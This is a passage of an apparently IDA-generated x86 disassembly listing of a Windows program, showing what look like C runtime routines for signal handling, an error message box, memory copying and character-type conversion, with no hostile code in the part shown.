mov ecx, dword_4922AC
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov dword_4922AC, edx
loc_4266B2: ; CODE XREF: .text:00426652�j
; .text:0042665F�j ...
push 1
call sub_41BD30
add esp, 4
jmp loc_426793
; ---------------------------------------------------------------------------
loc_4266C1: ; CODE XREF: .text:004265DE�j
cmp dword ptr [ebp+8], 8
jz short loc_4266D8
cmp dword ptr [ebp+8], 4
jz short loc_4266D8
cmp dword ptr [ebp+8], 0Bh
jz short loc_4266D8
jmp loc_426798
; ---------------------------------------------------------------------------
loc_4266D8: ; CODE XREF: .text:004266C5�j
; .text:004266CB�j ...
call sub_41FA10
mov [ebp-4], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], offset dword_4435D0
jnz short loc_426735
push 133h
push offset aWinsig_c ; "winsig.c"
push 2
mov ecx, dword_443650
push ecx
call sub_416A30
add esp, 10h
mov edx, [ebp-4]
mov [edx+50h], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], 0
jz short loc_426733
mov ecx, dword_443650
push ecx
push offset dword_4435D0
mov edx, [ebp-4]
mov eax, [edx+50h]
push eax
call sub_418A00
add esp, 0Ch
jmp short loc_426735
; ---------------------------------------------------------------------------
loc_426733: ; CODE XREF: .text:00426714�j
jmp short loc_426798
; ---------------------------------------------------------------------------
loc_426735: ; CODE XREF: .text:004266EA�j
; .text:00426731�j
mov ecx, [ebp-4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+8]
push eax
call sub_426AC0
add esp, 8
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_426753
jmp short loc_426798
; ---------------------------------------------------------------------------
loc_426753: ; CODE XREF: .text:0042674F�j
mov ecx, [ebp-8]
mov edx, [ecx+8]
mov [ebp-0Ch], edx
loc_42675C: ; CODE XREF: .text:loc_426791�j
mov eax, [ebp-8]
mov ecx, [eax+4]
cmp ecx, [ebp+8]
jnz short loc_426793
mov edx, [ebp-8]
mov eax, [ebp+0Ch]
mov [edx+8], eax
mov ecx, [ebp-8]
add ecx, 0Ch
mov [ebp-8], ecx
mov edx, dword_443654
imul edx, 0Ch
mov eax, [ebp-4]
mov ecx, [eax+50h]
add ecx, edx
cmp [ebp-8], ecx
jb short loc_426791
jmp short loc_426793
; ---------------------------------------------------------------------------
loc_426791: ; CODE XREF: .text:0042678D�j
jmp short loc_42675C
; ---------------------------------------------------------------------------
loc_426793: ; CODE XREF: .text:004266BC�j
; .text:00426765�j ...
mov eax, [ebp-0Ch]
jmp short loc_4267A6
; ---------------------------------------------------------------------------
loc_426798: ; CODE XREF: .text:loc_4265C3�j
; .text:0042663A�j ...
call sub_422F20
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_4267A6: ; CODE XREF: .text:00426796�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
off_4267AB dd offset loc_426666 ; DATA XREF: .text:0042665F�r
dd offset loc_4266A0
dd offset loc_42667A
dd offset loc_42668D
dd offset loc_4266B2
byte_4267BF db 0 ; DATA XREF: .text:00426659�r
dd 3 dup(4040404h), 4040401h, 3020404h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4267E0 proc near ; DATA XREF: .text:00426605�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push 1
call sub_41BC90
add esp, 4
cmp [ebp+arg_0], 0
jnz short loc_42680E
mov [ebp+var_8], offset dword_4922A0
mov eax, [ebp+var_8]
mov ecx, [eax]
mov [ebp+var_C], ecx
mov [ebp+var_4], 2
jmp short loc_426824
; ---------------------------------------------------------------------------
loc_42680E: ; CODE XREF: sub_4267E0+14�j
mov [ebp+var_8], offset dword_4922A4
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_C], eax
mov [ebp+var_4], 15h
loc_426824: ; CODE XREF: sub_4267E0+2C�j
cmp [ebp+var_C], 0
jnz short loc_426838
push 1
call sub_41BD30
add esp, 4
xor eax, eax
jmp short loc_42686C
; ---------------------------------------------------------------------------
loc_426838: ; CODE XREF: sub_4267E0+48�j
cmp [ebp+var_C], 1
jz short loc_42685D
mov ecx, [ebp+var_8]
mov dword ptr [ecx], 0
push 1
call sub_41BD30
add esp, 4
mov edx, [ebp+var_4]
push edx
call [ebp+var_C]
add esp, 4
jmp short loc_426867
; ---------------------------------------------------------------------------
loc_42685D: ; CODE XREF: sub_4267E0+5C�j
push 1
call sub_41BD30
add esp, 4
loc_426867: ; CODE XREF: sub_4267E0+7B�j
mov eax, 1
loc_42686C: ; CODE XREF: sub_4267E0+56�j
mov esp, ebp
pop ebp
retn 4
sub_4267E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426880 proc near ; CODE XREF: sub_41C310+2E7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
sub ecx, 2
mov [ebp+var_20], ecx
cmp [ebp+var_20], 14h
ja loc_42694E
mov eax, [ebp+var_20]
xor edx, edx
mov dl, ds:byte_426AA2[eax]
jmp ds:off_426A8A[edx*4]
loc_4268B8: ; DATA XREF: .text:off_426A8A�o
mov [ebp+var_18], offset dword_4922A0
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp loc_426956
; ---------------------------------------------------------------------------
loc_4268D5: ; CODE XREF: sub_426880+31�j
; DATA XREF: .text:00426A96�o
mov [ebp+var_18], offset dword_4922A4
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_426956
; ---------------------------------------------------------------------------
loc_4268EF: ; CODE XREF: sub_426880+31�j
; DATA XREF: .text:00426A9A�o
mov [ebp+var_18], offset dword_4922A8
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_426956
; ---------------------------------------------------------------------------
loc_426909: ; CODE XREF: sub_426880+31�j
; DATA XREF: .text:00426A92�o
mov [ebp+var_18], offset dword_4922AC
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_426956
; ---------------------------------------------------------------------------
loc_426923: ; CODE XREF: sub_426880+31�j
; DATA XREF: .text:00426A8E�o
call sub_41FA10
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_426AC0
add esp, 8
add eax, 8
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
jmp short loc_426956
; ---------------------------------------------------------------------------
loc_42694E: ; CODE XREF: sub_426880+20�j
; sub_426880+31�j
; DATA XREF: ...
or eax, 0FFFFFFFFh
jmp loc_426A86
; ---------------------------------------------------------------------------
loc_426956: ; CODE XREF: sub_426880+50�j
; sub_426880+6D�j ...
cmp [ebp+var_C], 0
jz short loc_426966
push 1
call sub_41BC90
add esp, 4
loc_426966: ; CODE XREF: sub_426880+DA�j
cmp [ebp+var_1C], 1
jnz short loc_426983
cmp [ebp+var_C], 0
jz short loc_42697C
push 1
call sub_41BD30
add esp, 4
loc_42697C: ; CODE XREF: sub_426880+F0�j
xor eax, eax
jmp loc_426A86
; ---------------------------------------------------------------------------
loc_426983: ; CODE XREF: sub_426880+EA�j
cmp [ebp+var_1C], 0
jnz short loc_4269A0
cmp [ebp+var_C], 0
jz short loc_426999
push 1
call sub_41BD30
add esp, 4
loc_426999: ; CODE XREF: sub_426880+10D�j
push 3
call sub_41B330
loc_4269A0: ; CODE XREF: sub_426880+107�j
cmp [ebp+arg_0], 8
jz short loc_4269B2
cmp [ebp+arg_0], 0Bh
jz short loc_4269B2
cmp [ebp+arg_0], 4
jnz short loc_4269DE
loc_4269B2: ; CODE XREF: sub_426880+124�j
; sub_426880+12A�j
mov eax, [ebp+var_4]
mov ecx, [eax+54h]
mov [ebp+var_14], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+54h], 0
cmp [ebp+arg_0], 8
jnz short loc_4269DE
mov eax, [ebp+var_4]
mov ecx, [eax+58h]
mov [ebp+var_8], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+58h], 8Ch
loc_4269DE: ; CODE XREF: sub_426880+130�j
; sub_426880+149�j
cmp [ebp+arg_0], 8
jnz short loc_426A20
mov eax, dword_443648
mov [ebp+var_10], eax
jmp short loc_4269F7
; ---------------------------------------------------------------------------
loc_4269EE: ; CODE XREF: sub_426880+19C�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_4269F7: ; CODE XREF: sub_426880+16C�j
mov edx, dword_443648
add edx, dword_44364C
cmp [ebp+var_10], edx
jge short loc_426A1E
mov eax, [ebp+var_10]
imul eax, 0Ch
mov ecx, [ebp+var_4]
mov edx, [ecx+50h]
mov dword ptr [edx+eax+8], 0
jmp short loc_4269EE
; ---------------------------------------------------------------------------
loc_426A1E: ; CODE XREF: sub_426880+186�j
jmp short loc_426A29
; ---------------------------------------------------------------------------
loc_426A20: ; CODE XREF: sub_426880+162�j
mov eax, [ebp+var_18]
mov dword ptr [eax], 0
loc_426A29: ; CODE XREF: sub_426880:loc_426A1E�j
cmp [ebp+var_C], 0
jz short loc_426A39
push 1
call sub_41BD30
add esp, 4
loc_426A39: ; CODE XREF: sub_426880+1AD�j
cmp [ebp+arg_0], 8
jnz short loc_426A50
mov ecx, [ebp+var_4]
mov edx, [ecx+58h]
push edx
push 8
call [ebp+var_1C]
add esp, 8
jmp short loc_426A5A
; ---------------------------------------------------------------------------
loc_426A50: ; CODE XREF: sub_426880+1BD�j
mov eax, [ebp+arg_0]
push eax
call [ebp+var_1C]
add esp, 4
loc_426A5A: ; CODE XREF: sub_426880+1CE�j
cmp [ebp+arg_0], 8
jz short loc_426A6C
cmp [ebp+arg_0], 0Bh
jz short loc_426A6C
cmp [ebp+arg_0], 4
jnz short loc_426A84
loc_426A6C: ; CODE XREF: sub_426880+1DE�j
; sub_426880+1E4�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
mov [ecx+54h], edx
cmp [ebp+arg_0], 8
jnz short loc_426A84
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+58h], ecx
loc_426A84: ; CODE XREF: sub_426880+1EA�j
; sub_426880+1F9�j
xor eax, eax
loc_426A86: ; CODE XREF: sub_426880+D1�j
; sub_426880+FE�j
mov esp, ebp
pop ebp
retn
sub_426880 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
off_426A8A dd offset loc_4268B8 ; DATA XREF: sub_426880+31�r
dd offset loc_426923
dd offset loc_426909
dd offset loc_4268D5
dd offset loc_4268EF
dd offset loc_42694E
byte_426AA2 db 0 ; DATA XREF: sub_426880+2B�r
db 5
dd 5050501h, 1050501h, 2050505h, 5050505h, 0CC040305h
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426AC0 proc near ; CODE XREF: .text:00426740�p
; sub_426880+B6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_426ACA: ; CODE XREF: sub_426AC0+31�j
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
cmp edx, [ebp+arg_0]
jz short loc_426AF3
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ecx, dword_443654
imul ecx, 0Ch
mov edx, [ebp+arg_4]
add edx, ecx
cmp [ebp+var_4], edx
jnb short loc_426AF3
jmp short loc_426ACA
; ---------------------------------------------------------------------------
loc_426AF3: ; CODE XREF: sub_426AC0+13�j
; sub_426AC0+2F�j
mov eax, dword_443654
imul eax, 0Ch
mov ecx, [ebp+arg_4]
add ecx, eax
cmp [ebp+var_4], ecx
jnb short loc_426B15
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_0]
jnz short loc_426B15
mov eax, [ebp+var_4]
jmp short loc_426B17
; ---------------------------------------------------------------------------
loc_426B15: ; CODE XREF: sub_426AC0+43�j
; sub_426AC0+4E�j
xor eax, eax
loc_426B17: ; CODE XREF: sub_426AC0+53�j
mov esp, ebp
pop ebp
retn
sub_426AC0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_41FA10
add eax, 58h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B30 proc near ; CODE XREF: .text:004288B9�p
push ebp
mov ebp, esp
call sub_41FA10
add eax, 54h
pop ebp
retn
sub_426B30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B40 proc near ; CODE XREF: sub_41C310+2CE�p
; sub_4260B0+1B0�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
cmp dword_4922B4, 0
jnz short loc_426BB3
push offset aUser32_dll_0 ; "user32.dll"
call ds:dword_49434C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_426B87
push offset aMessageboxa ; "MessageBoxA"
mov eax, [ebp+var_8]
push eax
call ds:dword_494348
mov dword_4922B4, eax
cmp dword_4922B4, 0
jnz short loc_426B8B
loc_426B87: ; CODE XREF: sub_426B40+28�j
xor eax, eax
jmp short loc_426BF7
; ---------------------------------------------------------------------------
loc_426B8B: ; CODE XREF: sub_426B40+45�j
push offset aGetactivewindo ; "GetActiveWindow"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_494348
mov dword_4922B8, eax
push offset aGetlastactivep ; "GetLastActivePopup"
mov edx, [ebp+var_8]
push edx
call ds:dword_494348
mov dword_4922BC, eax
loc_426BB3: ; CODE XREF: sub_426B40+14�j
cmp dword_4922B8, 0
jz short loc_426BC5
call dword_4922B8
mov [ebp+var_4], eax
loc_426BC5: ; CODE XREF: sub_426B40+7A�j
cmp [ebp+var_4], 0
jz short loc_426BE1
cmp dword_4922BC, 0
jz short loc_426BE1
mov eax, [ebp+var_4]
push eax
call dword_4922BC
mov [ebp+var_4], eax
loc_426BE1: ; CODE XREF: sub_426B40+89�j
; sub_426B40+92�j
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_4922B4
loc_426BF7: ; CODE XREF: sub_426B40+49�j
mov esp, ebp
pop ebp
retn
sub_426B40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C00 proc near ; CODE XREF: sub_41CC00+581�p
; .text:0041E10B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_426C20
cmp edi, eax
jb loc_426D98
loc_426C20: ; CODE XREF: sub_426C00+16�j
test edi, 3
jnz short loc_426C3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_426C5C
rep movsd
jmp ds:off_426D48[edx*4]
; ---------------------------------------------------------------------------
loc_426C3C: ; CODE XREF: sub_426C00+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_426C54
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_426C5C+4[eax*4]
; ---------------------------------------------------------------------------
loc_426C54: ; CODE XREF: sub_426C00+46�j
jmp dword ptr ds:loc_426D58[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_426C5C: ; CODE XREF: sub_426C00+31�j
; sub_426C00+8E�j ...
jmp ds:off_426CDC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_426C70
dd offset loc_426C9C
dd offset loc_426CC0
; ---------------------------------------------------------------------------
loc_426C70: ; DATA XREF: sub_426C00+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_426C5C
rep movsd
jmp ds:off_426D48[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_426C9C: ; DATA XREF: sub_426C00+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_426C5C
rep movsd
jmp ds:off_426D48[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_426CC0: ; DATA XREF: sub_426C00+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_426C5C
rep movsd
jmp ds:off_426D48[edx*4]
; ---------------------------------------------------------------------------
align 4
off_426CDC dd offset loc_426D3F ; DATA XREF: sub_426C00:loc_426C5C�r
dd offset loc_426D2C
dd offset loc_426D24
dd offset loc_426D1C
dd offset loc_426D14
dd offset loc_426D0C
dd offset loc_426D04
dd offset loc_426CFC
; ---------------------------------------------------------------------------
loc_426CFC: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_426D04: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_426D0C: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_426D14: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_426D1C: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_426D24: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_426D2C: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_426D3F: ; CODE XREF: sub_426C00:loc_426C5C�j
; DATA XREF: sub_426C00:off_426CDC�o
jmp ds:off_426D48[edx*4]
; ---------------------------------------------------------------------------
align 4
off_426D48 dd offset loc_426D58 ; DATA XREF: sub_426C00+35�r
; sub_426C00+92�r ...
dd offset loc_426D60
dd offset loc_426D6C
dd offset loc_426D80
; ---------------------------------------------------------------------------
loc_426D58: ; CODE XREF: sub_426C00+35�j
; sub_426C00+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_426D60: ; CODE XREF: sub_426C00+35�j
; sub_426C00+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_426D6C: ; CODE XREF: sub_426C00+35�j
; sub_426C00+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_426D80: ; CODE XREF: sub_426C00+35�j
; sub_426C00+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_426D98: ; CODE XREF: sub_426C00+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_426DCC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_426DC0
std
rep movsd
cld
jmp ds:off_426EE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_426DC0: ; CODE XREF: sub_426C00+1B1�j
; sub_426C00+208�j ...
neg ecx
jmp ds:off_426E90[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_426DCC: ; CODE XREF: sub_426C00+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_426DE4
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_426DE4+4[eax*4]
; ---------------------------------------------------------------------------
loc_426DE4: ; CODE XREF: sub_426C00+1D6�j
; DATA XREF: sub_426C00+1DD�r
jmp ds:off_426EE0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_426DF7+1
; ---------------------------------------------------------------------------
sbb [esi+42h], ch
add [eax+6Eh], al
inc edx
loc_426DF7: ; DATA XREF: sub_426C00+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_426DC0
std
rep movsd
cld
jmp ds:off_426EE0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_426DC0
std
rep movsd
cld
jmp ds:off_426EE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_426DC0
std
rep movsd
cld
jmp ds:off_426EE0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_426E94
dd offset loc_426E9C
dd offset loc_426EA4
dd offset loc_426EAC
dd offset loc_426EB4
dd offset loc_426EBC
dd offset loc_426EC4
off_426E90 dd offset loc_426ED7 ; DATA XREF: sub_426C00+1C2�r
; ---------------------------------------------------------------------------
loc_426E94: ; DATA XREF: sub_426C00+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_426E9C: ; DATA XREF: sub_426C00+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_426EA4: ; DATA XREF: sub_426C00+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_426EAC: ; DATA XREF: sub_426C00+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_426EB4: ; DATA XREF: sub_426C00+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_426EBC: ; DATA XREF: sub_426C00+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_426EC4: ; DATA XREF: sub_426C00+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_426ED7: ; CODE XREF: sub_426C00+1C2�j
; DATA XREF: sub_426C00:off_426E90�o
jmp ds:off_426EE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_426EE0 dd offset loc_426EF0 ; DATA XREF: sub_426C00+1B7�r
; sub_426C00:loc_426DE4�r ...
dd offset loc_426EF8
dd offset loc_426F08
dd offset loc_426F1C
; ---------------------------------------------------------------------------
loc_426EF0: ; CODE XREF: sub_426C00+1B7�j
; sub_426C00:loc_426DE4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_426EF8: ; CODE XREF: sub_426C00+1B7�j
; sub_426C00:loc_426DE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_426F08: ; CODE XREF: sub_426C00+1B7�j
; sub_426C00:loc_426DE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_426F1C: ; CODE XREF: sub_426C00+1B7�j
; sub_426C00:loc_426DE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_426C00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426F40 proc near ; CODE XREF: sub_41E750+98�p
; sub_424670+EC�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433400
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_4922C0, 0
jnz short loc_426FBE
lea eax, [ebp+var_1C]
push eax
push 1
push offset dword_43301C
push 1
call ds:dword_4942C0
test eax, eax
jz short loc_426F92
mov dword_4922C0, 1
jmp short loc_426FBE
; ---------------------------------------------------------------------------
loc_426F92: ; CODE XREF: sub_426F40+44�j
lea ecx, [ebp+var_1C]
push ecx
push 1
push offset dword_433018
push 1
push 0
call ds:dword_4942C4
test eax, eax
jz short loc_426FB7
mov dword_4922C0, 2
jmp short loc_426FBE
; ---------------------------------------------------------------------------
loc_426FB7: ; CODE XREF: sub_426F40+69�j
xor eax, eax
jmp loc_4270E8
; ---------------------------------------------------------------------------
loc_426FBE: ; CODE XREF: sub_426F40+2D�j
; sub_426F40+50�j ...
cmp dword_4922C0, 2
jnz short loc_426FF5
cmp [ebp+arg_14], 0
jnz short loc_426FD6
mov edx, dword_492170
mov [ebp+arg_14], edx
loc_426FD6: ; CODE XREF: sub_426F40+8B�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_14]
push ecx
call ds:dword_4942C4
jmp loc_4270E8
; ---------------------------------------------------------------------------
loc_426FF5: ; CODE XREF: sub_426F40+85�j
cmp dword_4922C0, 1
jnz loc_4270E6
cmp [ebp+arg_10], 0
jnz short loc_427011
mov edx, dword_492180
mov [ebp+arg_10], edx
loc_427011: ; CODE XREF: sub_426F40+C6�j
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_18]
neg edx
sbb edx, edx
and edx, 8
add edx, 1
push edx
mov eax, [ebp+arg_10]
push eax
call ds:dword_4942D4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_427045
xor eax, eax
jmp loc_4270E8
; ---------------------------------------------------------------------------
loc_427045: ; CODE XREF: sub_426F40+FC�j
mov [ebp+var_4], 0
mov eax, [ebp+var_20]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_2C], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_2C]
mov [ebp+var_24], ecx
mov edx, [ebp+var_20]
shl edx, 1
push edx
push 0
mov eax, [ebp+var_24]
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42709B
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42709B: ; CODE XREF: sub_426F40+142�j
cmp [ebp+var_24], 0
jnz short loc_4270A5
xor eax, eax
jmp short loc_4270E8
; ---------------------------------------------------------------------------
loc_4270A5: ; CODE XREF: sub_426F40+15F�j
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
push 1
mov edx, [ebp+arg_10]
push edx
call ds:dword_4942D4
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_4270CE
xor eax, eax
jmp short loc_4270E8
; ---------------------------------------------------------------------------
loc_4270CE: ; CODE XREF: sub_426F40+188�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_0]
